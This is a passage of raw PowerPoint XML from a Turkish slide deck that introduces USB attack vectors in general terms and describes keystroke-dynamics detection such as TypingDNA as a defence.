              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ancak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlantı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>noktası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yalnızca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>huylu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çevresel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zamanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bulaşmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Artan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>incelendiğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karmaşıklığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> her </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geçen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>artmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>artık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sosyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mühendislikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjeksiyonuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vektörünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içeriyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışmada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliştirilmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vektörlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>inceleyecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>örnek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>senaryolar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>oluşturacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleştirilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>savunma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>incelenecektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Why we need to be wary of USB attacks in industry | Stormshield">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D4BC1B-3CF7-483B-AF24-5F25371D39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14" t="9028" r="29688" b="11111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7781925" y="2170744"/>
            <a:ext cx="2695576" cy="32206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11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amo.githubusercontent.com/7d05e47fe75392efaac7ec19c80e7bc162648e5ff0264545113b1ec956c08407/687474703a2f2f6b6f6e756b6f69692e636f6d2f626c6f672f77702d636f6e74656e742f75706c6f6164732f323031362f31302f6475636b68756e742d73637265656e73686f742e706e67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26383FE-8B7D-49DA-A6D7-12C3B5F5C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171574"/>
            <a:ext cx="8397097" cy="419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17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78B0-BEBD-41CF-B835-8F5AFCEFC886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919119" y="0"/>
            <a:ext cx="10353761" cy="1326321"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Tuş vuruşu dinamikleri tabanlı tespit mekanizmaları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBCDD77-5E57-4510-958F-4649A1748D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374763" y="3015483"/>
            <a:ext cx="3624749"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TypingDNA</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAA050B3-67C2-4864-9C26-92E6A5D1FD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374763" y="3836746"/>
            <a:ext cx="3624749" cy="27920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200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>TypingDNA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>davranışlarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimliklerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğrulamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hizmettir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hizmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemdeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> her </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>davranışını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
